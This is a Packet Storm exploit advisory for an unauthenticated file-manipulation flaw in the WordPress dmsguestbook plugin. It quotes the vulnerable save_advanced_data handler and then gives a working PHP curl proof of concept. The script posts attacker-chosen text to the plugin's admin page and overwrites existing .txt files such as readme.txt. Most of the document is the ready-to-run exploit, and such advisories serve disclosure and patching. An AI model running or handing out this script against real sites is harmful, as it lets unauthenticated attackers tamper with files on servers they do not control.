WordPress Dmsguestbook plugin suffers from a remote unauthenticated data injection vulnerability.
196b447c8f48a497957f3386f73aabc903eced80e2d5a3266d6cfe4877d68af5http://packetstormsecurity.com/user/evex/
Author:Evex
Title:
WordPress dmsguestbook Plugin File Manipulation
Description:
wordpress dmsguestbook plugin is vulnerable to a file manipulation security
issue
it allows an unauthenicated attacker to put text into existing text files
only
<?php
/*
Vulnerability Code:
if ($POSTVARIABLE['action'] =='save_advanced_data') {
$abspath = str_replace("\\","/", ABSPATH);
// check the folder variable
if($POSTVARIABLE['folder']=="language/"){
$folder="language/";
} else {$folder="";}
// check the file variable xxxx.txt
if(preg_match('/^[a-z0-9]+\.+(txt)/i', $POSTVARIABLE['file'])==1) {
$file=$POSTVARIABLE['file'];
} else {$file="";}
clearstatcache();
if (file_exists($abspath . "wp-content/plugins/dmsguestbook/" .
$folder . $file)) {
$handle = fopen($abspath . "wp-content/plugins/dmsguestbook/" .
$folder . $file, "w");
$writetofile = str_replace("\\", "",
$POSTVARIABLE['advanced_data']);
fwrite($handle, $writetofile);
fclose($handle);
message("<b>" . __("saved", "dmsguestbook") . "...</b>",300,800);
} else {message("<br /><b>" . __("File not found!", "dmsguestbook")
. "</b>",300,800);}
}
*/
$TEXTTOINJECT = 'INPUT TEXT HERE';
$TXTFILE = 'readme.txt'; #
localhost/wp-content/plugins/dmsguestbook/readme.txt
$url = "http://localhost/x/wordpress";
$ch = curl_init();
curl_setopt($ch,CURLOPT_POST,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,"action=save_advanced_data&file=$TXTFILE&advanced_data=$TEXTTOINJECT");
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch,CURLOPT_URL,$url.'/wp-admin/admin.php?page=dmsguestbook');
curl_exec($ch);
echo "Payload Sent\nUrl: $url/wp-content/plugins/dmsguestbook/readme.txt";
?>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed